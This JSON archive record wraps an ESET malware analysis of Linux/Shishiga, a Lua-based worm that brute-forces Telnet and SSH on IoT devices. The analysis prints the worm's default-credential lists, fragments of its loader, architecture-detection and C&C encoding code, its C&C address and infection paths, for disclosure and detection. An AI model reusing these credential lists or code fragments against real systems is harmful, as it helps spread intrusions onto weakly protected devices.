{
	"id": "cca4f073-5c79-43d1-8870-f0b1b4d4b9a6",
	"created_at": "2026-04-06T01:31:26.548891Z",
	"updated_at": "2026-04-10T03:24:18.185886Z",
	"deleted_at": null,
	"sha1_hash": "4b4bdc39a19179d56992dbcf93e72845ddc48bf9",
	"title": "Linux Shishiga malware using LUA scripts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 146877,
	"plain_text": "Linux Shishiga malware using LUA scripts\r\nBy ESET ResearchMichal Malik\r\nArchived: 2026-04-06 00:31:11 UTC\r\nThe usage of the BitTorrent protocol and Lua modules separates Linux/Shishiga from other types of malware,\r\naccording to analysis by ESET.\r\n25 Apr 2017  •  , 12 min. read\r\nAmong all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web - their\r\ndetection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family\r\nhave generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents\r\na new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name:\r\nLinux/Shishiga. It uses 4 different protocols (SSH - Telnet - HTTP - BitTorrent) and Lua scripts for modularity.\r\nHow to meet Shishiga?\r\nLinux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak\r\ncredentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to\r\nbruteforce SSH credentials too. 
Here is the complete credentials list at the time of writing:\r\nbftelnet.lua\r\n[...]\r\nlocal accounts={\r\n {\"admin\",\"admin\"},\r\n {\"root\",\"root\"},\r\n {\"adm\",\"adm\"},\r\n {\"acer\",\"acer\"},\r\n {\"user\",\"user\"},\r\n {\"security\",\"security\"}\r\n}\r\n[...]\r\nbfssh.lua\r\n[...]\r\nlocal accounts={\r\n {\"admin\",\"admin\"},\r\n {\"root\",\"root\"},\r\n {\"adm\",\"adm\"},\r\n {\"ubnt\",\"ubnt\"},\r\n {\"root\",\"\"},\r\n {\"admin\",\"\"},\r\n {\"adm\",\"\"},\r\n {\"user\",\"user\"},\r\n {\"pi\",\"pi\"},\r\n}\r\n--[[\r\n {\"acer\",\"acer\"},\r\n {\"security\",\"security\"},\r\n {\"root\",\"toor\"},\r\n {\"root\",\"roottoor\"},\r\n {\"root\",\"password\"},\r\n {\"root\",\"test\"},\r\n {\"root\",\"abc123\"},\r\n {\"root\",\"111111\"},\r\n {\"root\",\"1q2w3e\"},\r\n {\"root\",\"oracle\"},\r\n {\"root\",\"1q2w3e4r\"},\r\n {\"root\",\"123123\"},\r\n {\"root\",\"qwe123\"},\r\n {\"root\",\"p@ssw0rd\"},\r\n {\"root\",\"1\"},\r\n {\"root\",\"12\"},\r\n {\"root\",\"123\"},\r\n {\"root\",\"1234\"},\r\n {\"root\",\"12346\"},\r\n {\"root\",\"123467\"},\r\n {\"root\",\"1234678\"},\r\n {\"root\",\"12346789\"},\r\n {\"root\",\"123467890\"},\r\n {\"root\",\"qwerty\"},\r\n {\"root\",\"pass\"},\r\n {\"root\",\"toor\"},\r\n {\"root\",\"roottoor\"},\r\n {\"root\",\"password123\"},\r\n {\"root\",\"password123456\"},\r\n {\"root\",\"pass123\"},\r\n {\"root\",\"password\"},\r\n {\"root\",\"passw0rd\"},\r\n {\"root\",\"1qaz\"},\r\n {\"root\",\"1qaz2wsx\"},\r\n {\"root\",\"asdfgh\"},\r\n {\"user\",\"user\"},\r\n {\"user\",\"\"},\r\n {\"acer\",\"acer\"},\r\n {\"security\",\"security\"},\r\n {\"root\",\"passw0rds\"},\r\n]]\r\n[...]\r\nWe found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian),\r\nARM (armv4l), i686, and 
also PowerPC. These are common for IoT devices. We think that other architectures like\r\nSPARC, SH-4 or m68k could be supported as we will explain later.\r\nShishiga’s skills\r\nLinux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have\r\ntrouble unpacking these binaries because Shishiga adds data at the end of the packed file.\r\nAfter unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.\r\n$ file unpacked.i686.lm\r\nunpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),\r\nstatically linked, stripped\r\nOnce executed, the binary will initialize the malware Lua module with the following methods:\r\nMalware methods\r\nmalware_module_methods dd offset aGetver ; \"getver\"\r\n dd offset getver\r\n dd offset aGetos ; \"getos\"\r\n dd offset getos\r\n dd offset aGetarch ; \"getarch\"\r\n dd offset getarch\r\n dd offset aGetmacaddr ; \"getmacaddr\"\r\n dd offset getmacaddr\r\n dd offset aGetmods ; \"getmods\"\r\n dd offset getmods\r\n dd offset aSetargs ; \"setargs\"\r\n dd offset setargs\r\nThe getmods method will return the archive blob as we will explain later. Then hardcoded Lua code\r\n( malware.lua ) is executed via the luaL_loadstring and lua_pcall functions. 
The Lua code is quite\r\nstraightforward, but here is a quick walkthrough of the source code without any modifications on our part.\r\nmalware.lua\r\nlocal unistd=require(\"posix.unistd\")\r\nrequire(\"malware\")\r\nfunction getexe()\r\n  local fn=unistd.readlink(\"/proc/self/exe\")\r\n  if fn==nil and arg~=nil then\r\n    fn=arg[0] --symlink removed\r\n  end\r\n  if fn==nil then\r\n    print(\"couldn't find bot file\")\r\n    return nil\r\n  end\r\n  local file=io.open(fn,\"r\")\r\n  if file==nil then\r\n    print(\"couldn't find bot file\")\r\n    return nil\r\n  end\r\n  local data=file:read(\"*all\")\r\n  file:close()\r\n  return data\r\nend\r\nfunction getMods()\r\n  return zlib.inflate()(malware.getmods())\r\nend\r\nfunction getScriptFiles(scripts)\r\n  local files={}\r\n  local i=1\r\n  while true do\r\n    local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)\r\n    if a1==nil then\r\n      break\r\n    end\r\n    local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)\r\n    if a2==nil then\r\n      break\r\n    end\r\n    if c1~=c2 then\r\n      return nil\r\n    end\r\n    local src=string.sub(scripts,b1+1,a2-1)\r\n    i=b2+1\r\n    files[c1]=src\r\n  end\r\n  return files\r\nend\r\nmalware.exe=getexe() -- (1)\r\nlocal modules=getScriptFiles(getMods()) -- (2)\r\n[...]\r\nf=load(malware.modules['main.lua']) -- (3)\r\nlocal s,err=pcall(f)\r\nif s==false then\r\n  print(err)\r\nend\r\n(1) open the malware executable file from /proc/self/exe and return its content;\r\n(2) retrieve the zlib archive via the getmods method, decompress it, then parse it using tags and store it in a Lua array;\r\n(3) call the main.lua module;\r\nThere is an exhaustive list of all Lua scripts found in the IoCs section. 
Most of them have self-explanatory\r\nfilenames, but here is a brief summary of some of them.\r\ncallhome.lua\r\nretrieve the configuration file server.bt or servers from config.lua;\r\nif unable to reach the current default server, change to a different server;\r\nsend files (reports or accounts, both JSON formatted);\r\nexecute tasks from task list retrieved from the C\u0026C server;\r\nbfssh.lua / bftelnet.lua\r\nmodule to bruteforce SSH and Telnet logins;\r\ncheck if the command echo -en \"\\\\x31\\\\x33\\\\x33\\\\x37\" outputs 1337; if not, exit else continue;\r\ndevice architecture is determined from the /bin/ls file by running cat /bin/ls and parsing the ELF\r\nheader, see below;\r\nspread the malware (both .lm and .dm files) according to the device architecture;\r\nsave successful credentials;\r\nThe architecture checking code is as follows:\r\nbfssh.lua, getArchELF method\r\nfunction bfssh.getArchELF(text)\r\n  local bits,denc,ver,ftype,farch\r\n  if text==nil then\r\n    return nil\r\n  end\r\n  local i=text:find(\"\\x7fELF\") -- (1)\r\n  if i~=nil then\r\n    bits,denc,ver=string.unpack(\"\u003cBBB\",text:sub(i+4))\r\n    if denc==1 then\r\n      ftype,farch=string.unpack(\"\u003cHH\",text:sub(i+16)) -- (2)\r\n    else\r\n      ftype,farch=string.unpack(\"\u003eHH\",text:sub(i+16))\r\n    end\r\n  end\r\n  return bits,denc,farch -- (3)\r\nend\r\n(1) every ELF file has to start with \\x7fELF\r\n(2) ftype that represents e_type (ELF file type = executable, shared etc.) 
is not used\r\n(3) bits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA] (little\r\nor big endian), and farch represents e_machine in the ELF header\r\nbfssh.lua, getArchName method\r\nfunction bfssh.getArchName(bits,denc,farch) -- (1)\r\n  if farch==0x8 and denc==1 then -- (2)\r\n    return \"mipsel\"\r\n  end\r\n  if farch==0x8 and denc==2 then\r\n    return \"mips\"\r\n  end\r\n  if farch==0x28 then\r\n    return \"armv4l\"\r\n  end\r\n  if farch==0x2 then\r\n    return \"sparc\"\r\n  end\r\n  if farch==0x2a then\r\n    return \"sh4\"\r\n  end\r\n  if farch==0x4 then\r\n    return \"m68k\"\r\n  end\r\n  if farch==0x14 then\r\n    return \"powerpc\"\r\n  end\r\n  if farch==0x3 or farch==0x7 or farch==0x3e then -- (3)\r\n    return \"i686\"\r\n  end\r\n  return nil\r\nend\r\n(1) bits is not used\r\n(2) check if file is for MIPS little endian ( e_machine == EM_MIPS and e_ident[EI_DATA] == ELFDATA2LSB )\r\n(3) check if file is for Intel 80386 or Intel 80860 or AMD x86-64 ( e_machine == EM_386 or e_machine == EM_860 or e_machine == EM_X86_64 )\r\nconfig.lua\r\ncontains publicKey to verify the signature of the binary (.lm or .dm);\r\ncontains bootstrap nodes list;\r\ncontains filenames of .bt files, port numbers of SOCKS and HTTP server;\r\ncontains IP address of the server (probably C\u0026C server);\r\npersist.lua\r\npersistence method depending on the privilege (root or user)\r\nscanner.lua\r\nused to generate random /16 networks that are not local\r\nworm.lua (this script was removed in the latest version of Linux/Shishiga)\r\nallows scanning on a given port;\r\nallows upload;\r\ngets information from the new infected server;\r\nThe readme.lua script has a message banner that grabs your attention, if you speak Russian:\r\n ВСЁ ИДЁТ ПО ПЛАНУ\r\nА при коммунизме всё будет 
заебись\r\nОн наступит скоро — надо только подождать\r\nТам всё будет бесплатно,там всё будет в кайф\r\nТам наверное вощще не надо будет (умирать)\r\nЯ проснулся среди ночи и понял, что -\r\n ВСЁ ИДЁТ ПО ПЛАНУ\r\nThis translates to:\r\n EVERYTHING GOES ACCORDING TO PLAN\r\nWhen we get communism it'll all be fucking great.\r\nIt will come soon, we just have to wait.\r\nEverything will be free there, everything will be fun.\r\nWe'll probably not even have to die.\r\nI woke up in the middle of the night and realized\r\n EVERYTHING GOES ACCORDING TO PLAN\r\nIt seems that the malware author was inspired by E.Letov and his album Everything goes according to plan -\r\nsee the last verse of the title song.\r\nOver the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition\r\nof testing modules, removal of redundant files, but nothing especially noteworthy.\r\nWhile the main binary is named \u003carchitecture\u003e.lm , we also managed to retrieve binaries with the following\r\nname \u003carchitecture\u003e.dm  - a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses) port 2015 . One of\r\nthe small changes was in the name of this backdoor binary - it changed from dl to dm .\r\nShishiga communication\r\nLinux/Shishiga can communicate using any of the modules httpproto.lua , btloader.lua or server.lua .\r\nThe httpproto.lua module has functions that allow the given data to be encoded or decoded, and make HTTP\r\nPOST and GET requests. 
The source code below shows the process of encoding data.\r\nhttpproto.lua\r\n[...]\r\nfunction httpproto.encode(data)\r\n  local msg=bencode.encode(data)\r\n  local c=zlib.crc32()(msg)\r\n  local k=string.pack(\"\u003cI\",utils.random())\r\n  return k..crypto.rc4(k,string.pack(\"\u003cI\",c)..msg)\r\nend\r\n[...]\r\nbtloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from\r\nthe nodes.cfg file. It also retrieves its configuration data from {server,update,script}.bt files (in Bencode\r\nformat) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution\r\nof a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown\r\nas Python dictionaries.\r\nscript.bt\r\n{\r\n 'sig': \u003cremoved\u003e, # (1)\r\n 'k': \u003cremoved\u003e, # (2)\r\n 'salt': 'script',\r\n 'seq': 1486885364,\r\n 'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\\n'\r\n}\r\n(1) signature\r\n(2) public key\r\nupdate.bt\r\n{\r\n 'sig': \u003cremoved\u003e,\r\n 'k': \u003cremoved\u003e,\r\n 'salt': 'update',\r\n 'seq': 1486885364,\r\n 'v':\r\n 'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\\n\r\n 8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\\n\r\n 51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\\n\r\n 979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\\n\r\n ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\\n'\r\n}\r\nserver.bt\r\n{\r\n 'sig': \u003cremoved\u003e,\r\n 'k': \u003cremoved\u003e,\r\n 'salt': 'server',\r\n 'seq': 1486835166,\r\n 'v': '93.117.137.35:8080\\n'\r\n}\r\nFinally, the server.lua module’s main functionality is to create an HTTP server with the port defined in\r\nconfig.lua . 
In all samples we have analyzed so far, that is port 8888.\r\nThe server responds only to /info and /upload requests. Below is a (prettified) version of the server response\r\nto the /info path. All of the files below can be easily downloaded from the infected device.\r\n{\r\n \"src\":[ (1)\r\n \"test.lua\",\r\n \"test1.lua\",\r\n \"test10.lua\",\r\n \"test2.lua\",\r\n \"test3.lua\",\r\n \"test5.lua\",\r\n \"test6.lua\",\r\n \"test_1.lua\",\r\n \"test_2.lua\",\r\n \"test_3.lua\",\r\n \"test_4.lua\"\r\n ],\r\n \"dm\":[ (2)\r\n \"armv4l.dm\",\r\n \"i686.dm\",\r\n \"mips.dm\",\r\n \"mipsel.dm\"\r\n ],\r\n \"bt\":[ (3)\r\n \"script.bt\",\r\n \"server.bt\",\r\n \"update.bt\"\r\n ],\r\n \"version\":\"1.0.0\", (4)\r\n \"lua\":[ (5)\r\n \"armv4l.lm\",\r\n \"i686.lm\",\r\n \"mips.lm\",\r\n \"mipsel.lm\",\r\n \"powerpc.lm\"\r\n ],\r\n \"os\":\"lin\",\r\n \"arch\":\"i686\",\r\n \"lua_version\":\"Lua 5.3\"\r\n}\r\n(1) Lua scripts\r\n(2) backdoor (old name: .dl )\r\n(3) BitTorrent scripts\r\n(4) malware version\r\n(5) modules loader\r\nQuerying the root / on port 8888 will result in HTTP/1.0 404 OK, which serves as a simple indicator of\r\ncompromise (IoC).\r\nhttp.lua response function\r\nfunction http.response(req,code,data,timeout)\r\n  timeout=timeout or timeoutDef\r\n  local hdr=\"HTTP/1.0 %d OK\\r\\nContent-Length: %d\\r\\nConnection: close\\r\\n\\r\\n\"\r\n  async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)\r\n  return true\r\nend\r\nAt this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888.\r\nThey found about 10 IP addresses that match this particular HTTP answer. 
These IP addresses are potentially\r\ninfected machines.\r\nConclusion\r\nAt first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH\r\ncredentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used\r\nin a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more\r\npopular in the future.\r\nIt’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant\r\nadding, removing, and modifying of the components, code comments and even debug information, clearly\r\nindicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms,\r\nyou should not use default Telnet and SSH credentials.\r\nWe would like to thank the Censys team for their collaboration.\r\nIoCs\r\nC\u0026C\r\n93.117.137.35\r\nSHA-1 hashes 
(.lm)\r\nSHA-1 hashes (.dl)\r\nLua’s scripts 
filename\r\nasync.lua\r\nasync.lua.old\r\nbencode.lua\r\nbfssh.lua\r\nbfssh.lua.old2\r\nbftelnet.lua\r\nbtloader.lua\r\ncallhome.lua\r\ncallhome.lua.old\r\nconfig.lua\r\ncrypto.lua\r\ndht.lua\r\nevent.lua\r\nevs.lua\r\nhttp.lua\r\nhttpproto.lua\r\nlibevent2.lua\r\nluaevent.lua\r\nmain.lua\r\nmain2.lua\r\nmalware.lua\r\npersist.lua\r\nreadme.lua\r\nrouting.lua\r\nscanner.lua\r\nscanner2.lua\r\nserver.lua\r\nsocket.lua\r\nsocks.lua\r\nssh.lua\r\nssl.lua\r\ntelnet.lua\r\ntest.lua\r\ntest1.lua\r\ntest10.lua\r\ntest2.lua\r\ntest3.lua\r\ntest5.lua\r\ntest6.lua\r\nthreads.lua\r\ntorrent.lua\r\nudp.lua\r\nutils.lua\r\nworm.lua\r\nFiles that could potentially indicate an infection\r\n/tmp/.local/*\r\n/tmp/drop\r\n/tmp/srv\r\n$HOME/.local/ssh.txt\r\n$HOME/.local/telnet.txt\r\n$HOME/.local/nodes.cfg\r\n$HOME/.local/check\r\n$HOME/.local/script.bt\r\n$HOME/.local/update.bt\r\n$HOME/.local/server.bt\r\n$HOME/.local/syslog\r\n$HOME/.local/syslog.pid\r\n$HOME/.local/{armv4l,i686,mips,mipsel}.dm\r\n$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm\r\n/etc/rc2.d/S04syslogd\r\n/etc/rc3.d/S04syslogd\r\n/etc/rc4.d/S04syslogd\r\n/etc/rc5.d/S04syslogd\r\n/etc/init.d/syslogd\r\n/bin/syslogd\r\n/etc/cron.hourly/syslogd\r\nSource: https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/"
	],
	"report_names": [
		"linux-shishiga-malware-using-lua-scripts"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439086,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.pdf",
		"text": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.txt",
		"img": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.jpg"
	}
}